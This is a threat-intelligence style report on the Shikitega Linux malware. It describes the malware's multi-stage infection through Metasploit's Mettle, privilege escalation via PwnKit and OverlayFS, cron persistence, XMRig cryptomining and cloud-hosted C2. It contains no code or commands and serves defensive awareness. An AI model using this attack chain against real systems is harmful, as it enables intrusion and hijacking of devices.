Shikitega: New Malware Targets Linux Systems

By Anthony Eich on September 19, 2022

Executive Summary

Shikitega is the moniker given to a new malware payload that is designed to target Linux operating systems. The attack can take control of many different Linux distributions, not just those designed for servers and computer operating systems. Smaller IoT (internet of things) devices are also vulnerable and are less likely to have defenses capable of blocking the attacks [1]. The vector for initial infection is still being investigated, but it is known that once the initial Executable and Linkable Format (ELF) file is installed, the Mettle Meterpreter tool from Metasploit is used to install additional minute segments of the code that are virtually undetectable by signature based anti-virus solutions. When the multi-stage exploits are in place, the crontab command is executed to use the cron utility in Linux operating systems to further obfuscate the scheduled execution of a crypto mining tool, XMRig version 6.17.0. The machines are essentially then added to a botnet which is being used for cryptocurrency mining, and the command and control (C2) servers are being discovered all over the world [4]. With such a widely exploitable footprint, the possibility for this malware to spread to a great number of networks is extremely high.

Background

The latest malware to target Linux operating systems, dubbed Shikitega, uses the Mettle Meterpreter in the popular penetration testing software Metasploit to infect target machines in a multi-step payload methodology. Once installed, the malware gives the attackers full control over the Linux device by exploiting two known vulnerabilities. CVE-2021-4034 is known as PwnKit and allows for the execution of commands as another user [3][5]. The other exploit being deployed is CVE-2021-3493–OverlayFS–which takes advantage of a kernel vulnerability that allows for unprivileged overlay mounts, leading to elevated privileges [2][9]. As the malware propagates, each stage is designed to dig deeper into the system and continue to escalate privileges and add persistency. Once established, the malware communicates with C2 (command and control) servers that are also lightweight [1][4]. Often the C2 servers discovered are virtual instances being hosted on legitimate cloud services such as GCP (Google Cloud Platform) and AWS (Amazon Web Services). The reason that the malware is often not detected is due to the engineering design that employs polymorphic encoding, which obfuscates the data being transmitted in a way that does not set off alarms in intrusion detection systems and anti-virus programs. The ultimate payload of this malware is a cryptocurrency miner, showing that those responsible for this malware have an ultimate goal of financial gain. However, in the process of turning infected machines into mining zombies, those in control of the C2 will also have the ability to execute attacks such as webcam controls, sniffers, various reverse shells, shell commands, process controls, and more.

shikitega-overview.jpg [4]
Shikitega ELF [4]

Impact

Because the malware uses Mettle to deploy, which uses very few resources, the malware is capable of infecting the smallest Linux instances, such as those being used to operate firmware on IoT (internet of things) devices. This makes most modern networks that are not properly safeguarded by firewalls, endpoint protection, proper configuration, and anti-intrusion mechanisms, extremely vulnerable. Just one IoT device on an insecure network, such as a thermostat or security camera, can be infected by this malware which can then lead to other devices on the network being vulnerable to further attacks. The impact of this malware could have ongoing repercussions if the holes that allow for the transmission and execution of the malicious payload are not closed. Home networks, private industry, military, and government alike are all in one form or another using Linux operating systems. Since Linux operating systems all behave very similarly, it means that the Shikitega malware is likely to be a long-standing threat to networks of varying size and security designations.

Significance

Since Shikitega can infect not just laptops and typical operating systems, but also those running lightweight instances of Linux, the malware can infect almost any network that is not defended properly. With the ability to spread to a vast number of devices means that the transmission and spread could be one of the most prolific Linux malware payloads seen to date. To put this in perspective, Linux powers about 85% of all smartphones in use today [6]. That footprint alone should be enough to warrant a high level of concern regarding this malware. That does not include higher computing capacity endpoints such as servers and desktop/laptop computers, and even virtual machines. All these devices are vulnerable to the Shikitega malware. While the intention of the malware is to create a botnet used for cryptocurrency mining, there is clearly an opportunity to alter the payload in many ways. The spying capabilities alone are enough to cause a massive amount of damage if the C2 servers switched tactics to data exfiltration or ransomware. Also, since Linux updates are not pushed out as often or automatically as other operating systems, it is highly likely that many Linux systems will go unsecure for a longer period of time. The best practice, as always, is to update systems as soon as possible, and where necessary, manually configure operating systems to close holes that can be exploited by the threat actors responsible for this latest exploit.

References

[1] Arghire, I. (2022, September 8). New ‘Shikitega’ Linux Malware Grabs Complete Control of Infected Systems. Retrieved September 15, 2022, from securityweek.com: https://www.securityweek.com/new-shikitega-linux-malware-grabs-complete-control-infected-systems

[2] CVE-2021-3493 Detail. (2021, December 16). Retrieved September 15, 2022, from nvd.nist.gov: https://nvd.nist.gov/vuln/detail/CVE-2021-3493

[3] CVE-2021-4034 Detail. (2022, June 14). Retrieved September 15, 2022, from nvd.nist.gov: https://nvd.nist.gov/vuln/detail/cve-2021-4034

[4] GOODIN, D. (2022, September 9). New Linux malware combines unusual stealth with a full suite of capabilities. Retrieved September 15, 2022, from arstechnica.com: https://arstechnica.com/information-technology/2022/09/new-linux-malware-combines-unusual-stealth-with-a-full-suite-of-capabilities/

[5] Ilascu, I. (2022, January 25). Linux system service bug gives root on all major distros, exploit released. Retrieved September 15, 2022, from bleepingcomputer.com: https://www.bleepingcomputer.com/news/security/linux-system-service-bug-gives-root-on-all-major-distros-exploit-released/

[6] Ivan. (2022, May 25). Linux Statistics. Retrieved September 15, 2022, from truelist.co: https://truelist.co/blog/linux-statistics/

[7] Maury, J. (2022, September 14). New Linux Malware Shikitega Can Take Full Control of Devices. Retrieved September 15, 2022, from esecurityplanet.com: https://www.esecurityplanet.com/threats/new-linux-malware-takes-full-control-of-devices/

[8] rapid7/mettle. (n.d.). Retrieved September 15, 2022, from github.com: https://github.com/rapid7/mettle

[9] Toulas, B. (2022, September 6). New Linux malware evades detection using multi-stage deployment. Retrieved September 15, 2022, from bleepingcomputer.com: https://www.bleepingcomputer.com/news/security/new-linux-malware-evades-detection-using-multi-stage-deployment/